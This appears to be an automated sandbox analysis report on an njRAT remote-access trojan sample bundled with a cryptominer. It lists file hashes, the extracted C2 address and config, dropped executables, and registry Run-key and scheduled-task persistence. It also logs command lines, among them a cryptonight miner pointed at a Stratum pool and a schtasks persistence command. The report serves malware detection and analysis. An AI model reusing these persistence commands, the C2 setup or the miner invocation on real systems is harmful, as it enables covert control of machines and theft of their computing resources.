Analysis
- max time kernel: 151s
- max time network: 157s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 20-05-2022 12:37
Static task: static1
Behavioral task: behavioral1
  Sample: 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
  Resource: win10v2004-20220414-en
General
- Target: 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
- Size: 1.1MB
- MD5: bed8273f6aa0838212bfd15422318320
- SHA1: ba3abe75066d40dd95ebe7b6a601fe005b4d2dfd
- SHA256: 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed
- SHA512: 6aa2021b5c559c856e53925f710646db430ca35f1bbe81f334e8275a3f9e9dded58bfb3c5839f9c7d453a2a8e69cdee67b43d3e4c9727c0a813f7ac2b14d2039
Malware Config
Extracted: njrat
- Version: Njrat 0.7 Golden By Hassan Amiri
- Botnet: HacKed
- C2: 31.10.120.162:5555
- Windows Update
- reg_key: Windows Update
- splitter: |Hassan|
Signatures
- Detected Stratum cryptominer command
  Looks to be attempting to contact Stratum mining pool.
- Executes dropped EXE (5 IoCs)
  Processes: system.exe, nikoVIRA alph 13.10.4.2.exe, Server.exe, Server.exe, Server.exe
    pid | process
    112 | system.exe
    1116 | nikoVIRA alph 13.10.4.2.exe
    1692 | Server.exe
    772 | Server.exe
    1940 | Server.exe
- Drops startup file (2 IoCs)
  Processes: Server.exe
    description | ioc | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe | Server.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe | Server.exe
- Loads dropped DLL (7 IoCs)
  Processes: 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe, nikoVIRA alph 13.10.4.2.exe
    pid | process
    1964 | 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
    1964 | 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
    1156 |
    1964 | 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
    1116 | nikoVIRA alph 13.10.4.2.exe
    1116 | nikoVIRA alph 13.10.4.2.exe
    1116 | nikoVIRA alph 13.10.4.2.exe
- Adds Run key to start application (2 TTPs, 4 IoCs)
  Processes: 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe, Server.exe
    description | ioc | process
    Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\JELAHELMBKFGHEL = "C:\\Users\\Admin\\AppData\\Local\\Temp\\system.exe" | 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Roaming\\Server.exe\" .." | Server.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Roaming\\Server.exe\" .." | Server.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes: Server.exe
    pid | process
    1692 | Server.exe
- Suspicious use of AdjustPrivilegeToken (17 IoCs)
  Processes: Server.exe
    description | pid | process
    Token: SeDebugPrivilege | 1692 | Server.exe
    Token: 33 | 1692 | Server.exe (8 occurrences)
    Token: SeIncBasePriorityPrivilege | 1692 | Server.exe (8 occurrences)
- Suspicious use of WriteProcessMemory (28 IoCs)
  Processes: 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe, nikoVIRA alph 13.10.4.2.exe, Server.exe, taskeng.exe
    description | pid | process | target process
    PID 1964 wrote to memory of 112 | 1964 | 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe | system.exe (4 occurrences)
    PID 1964 wrote to memory of 1116 | 1964 | 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe | nikoVIRA alph 13.10.4.2.exe (4 occurrences)
    PID 1116 wrote to memory of 2000 | 1116 | nikoVIRA alph 13.10.4.2.exe | NOTEPAD.EXE (4 occurrences)
    PID 1116 wrote to memory of 1692 | 1116 | nikoVIRA alph 13.10.4.2.exe | Server.exe (4 occurrences)
    PID 1692 wrote to memory of 680 | 1692 | Server.exe | schtasks.exe (4 occurrences)
    PID 912 wrote to memory of 772 | 912 | taskeng.exe | Server.exe (4 occurrences)
    PID 912 wrote to memory of 1940 | 912 | taskeng.exe | Server.exe (4 occurrences)
Processes
- Process: C:\Users\Admin\AppData\Local\Temp\3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe"
  Signatures: Loads dropped DLL; Adds Run key to start application; Suspicious use of WriteProcessMemory
  - Process: C:\Users\Admin\AppData\Local\Temp\system.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\system.exe" -a cryptonight -o stratum+tcp://btc.pool.minergate.com:45560 -u egacom2288@gmail.com -t 1
    Signatures: Executes dropped EXE
  - Process: C:\Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exe"
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - Process: C:\Windows\SysWOW64\NOTEPAD.EXE
      Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Новый текстовый документ.txt
    - Process: C:\Users\Admin\AppData\Roaming\Server.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Server.exe"
      Signatures: Executes dropped EXE; Drops startup file; Adds Run key to start application; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - Process: C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /create /sc minute /mo 1 /tn Server /tr C:\Users\Admin\AppData\Local\Temp/Server.exe
        Signatures: Creates scheduled task(s)
- Process: C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {98EE2885-9776-48B8-BF1D-F5D00874A9A1} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]
  Signatures: Suspicious use of WriteProcessMemory
  - Process: C:\Users\Admin\AppData\Local\Temp\Server.exe
    Command line: C:\Users\Admin\AppData\Local\Temp/Server.exe
    Signatures: Executes dropped EXE
  - Process: C:\Users\Admin\AppData\Local\Temp\Server.exe
    Command line: C:\Users\Admin\AppData\Local\Temp/Server.exe
    Signatures: Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  Filesize: 43KB
  MD5: c43aaf0146a014160aaebe2f65150e62
  SHA1: 7c5bbccf84201c6bd05ed86c4ad88400a3d59575
  SHA256: 4f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
  SHA512: 8a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
- C:\Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exe
  Filesize: 710KB
  MD5: c93248685712aca2903f41280ebf535e
  SHA1: 1cc106d0822eecd8b9b6d56780fe19d826485768
  SHA256: c0014ac7d901c2e1231fa5e7734d5db64070dc08fb71adaf7720090f45d4e471
  SHA512: 21ae26e97aec9feeae3b3205a159ba7407970c58029093969e6fb3dc5c776f83796d076c2f4e8823ac029beb629e8607f85fdf58170835d6e17b01930b2076fc
- C:\Users\Admin\AppData\Local\Temp\system.exe
  Filesize: 502KB
  MD5: 806779989c6ea355a1abf4f6c7cb646c
  SHA1: 36d7f7a57e2a8ec953940d15099cae2fc565c16e
  SHA256: 126395638de030e60d4a3a5cf7a8f8b664aac9ca37dc9a766182f8dfd5228fe4
  SHA512: 87cb14530041b4c09e7de2f77b5a7e2d60278f6916dbed663a1e90e2b35d916f1ff05908ea562661bd5598c60799191ea95550e7e98e8b4ab218179217aecb51
- C:\Users\Admin\AppData\Roaming\Server.exe
  Filesize: 43KB
  MD5: c43aaf0146a014160aaebe2f65150e62
  SHA1: 7c5bbccf84201c6bd05ed86c4ad88400a3d59575
  SHA256: 4f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
  SHA512: 8a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
- C:\Users\Admin\AppData\Roaming\Новый текстовый документ.txt
  Filesize: 55.5MB
  MD5: 90ad01221aca326184512bd924aa80b3
  SHA1: 5cadad1a1feed32529dd5c4f3a367588042206aa
  SHA256: fe63530654ff0f7e301429003c8400b35428252eb5df6a3cd28db53e98ad8055
  SHA512: a0c7a73074885394dbd80d55c711d2d77e34eac94f8bfaea5c3fb8f7837ec8583a6f186be8c8f37558b9bc6d25e97932b745884d4bdbc934d1d8f6a8f6eca08d
- \Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exe
  Filesize: 710KB
  MD5: c93248685712aca2903f41280ebf535e
  SHA1: 1cc106d0822eecd8b9b6d56780fe19d826485768
  SHA256: c0014ac7d901c2e1231fa5e7734d5db64070dc08fb71adaf7720090f45d4e471
  SHA512: 21ae26e97aec9feeae3b3205a159ba7407970c58029093969e6fb3dc5c776f83796d076c2f4e8823ac029beb629e8607f85fdf58170835d6e17b01930b2076fc
- \Users\Admin\AppData\Local\Temp\system.exe
  Filesize: 502KB
  MD5: 806779989c6ea355a1abf4f6c7cb646c
  SHA1: 36d7f7a57e2a8ec953940d15099cae2fc565c16e
  SHA256: 126395638de030e60d4a3a5cf7a8f8b664aac9ca37dc9a766182f8dfd5228fe4
  SHA512: 87cb14530041b4c09e7de2f77b5a7e2d60278f6916dbed663a1e90e2b35d916f1ff05908ea562661bd5598c60799191ea95550e7e98e8b4ab218179217aecb51
- \Users\Admin\AppData\Roaming\Server.exe
  Filesize: 43KB
  MD5: c43aaf0146a014160aaebe2f65150e62
  SHA1: 7c5bbccf84201c6bd05ed86c4ad88400a3d59575
  SHA256: 4f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
  SHA512: 8a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
- memory/112-72-0x0000000000400000-0x0000000000486000-memory.dmp
  Filesize: 536KB
- memory/112-57-0x0000000000000000-mapping.dmp
- memory/680-77-0x0000000000000000-mapping.dmp
- memory/772-79-0x0000000000000000-mapping.dmp
- memory/772-81-0x00000000001A0000-0x00000000001B2000-memory.dmp
  Filesize: 72KB
- memory/1116-61-0x0000000000000000-mapping.dmp
- memory/1692-75-0x00000000002F0000-0x0000000000302000-memory.dmp
  Filesize: 72KB
- memory/1692-70-0x0000000000000000-mapping.dmp
- memory/1940-82-0x0000000000000000-mapping.dmp
- memory/1964-54-0x0000000075401000-0x0000000075403000-memory.dmp
  Filesize: 8KB
- memory/2000-65-0x0000000000000000-mapping.dmp